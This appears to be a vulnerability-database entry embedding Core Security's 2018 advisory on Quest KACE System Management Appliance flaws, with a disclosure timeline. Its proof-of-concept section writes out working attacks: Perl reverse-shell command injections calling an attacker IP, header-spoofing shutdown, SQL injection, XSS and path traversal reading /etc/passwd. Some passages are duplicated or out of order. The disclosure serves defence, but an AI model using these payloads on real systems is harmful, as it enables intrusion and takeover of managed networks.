\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, 
OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. 
Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nchannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nQuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 
\n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. 
\n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity \u0026 access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. 
*PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11142",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15644",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11142",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"id": "VAR-201805-0602",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
}
]
},
"last_update_date": "2023-12-18T12:01:57.447000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/jp-ja/products/kace-systems-management-appliance/"
},
{
"title": "QuestKACESystemManagementAppliance Critical Function Authorization Insufficient Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137675"
},
{
"title": "Quest KACE System Management Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81224"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.0
},
{
"problemtype": "CWE-285",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/863.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"date": "2018-07-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.747000",
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15644"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11142"
},
{
"date": "2018-07-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005606"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-11142"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Appliance Authorization vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005606"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1212"
}
],
"trust": 0.6
}
}
VAR-201805-0594
Vulnerability from variot - Updated: 2023-12-18 12:01 In order to perform actions that require higher privileges, the Quest KACE System Management Appliance 8.0.318 relies on a message queue manager that runs with root privileges and only allows a set of commands. One of the available commands allows changing any user's password (including root). A low-privilege user could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges. Quest KACE System Management Appliance contains a vulnerability related to the password management function. There is a possibility that information is obtained, information is altered, and service operation is disrupted (DoS). Quest KACE System Management Appliance is an IT asset management device from Quest Software, USA. A security vulnerability exists in the Quest KACE System Management Appliance 8.0.318 release. An attacker could use this vulnerability to change the 'kace_support' account password. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends on each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4.
7.5.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers, which indicates that the localhost check relies on client-supplied header values rather than on the source address of the connection.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. Unauthenticated SQL Injection in download_agent_installer.php
[CVE-2018-11136] The 'orgID' parameter received by the '/common/download_agent_installer.php' script is not sanitized, leading to SQL injection. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. SQL Injection in run_report.php
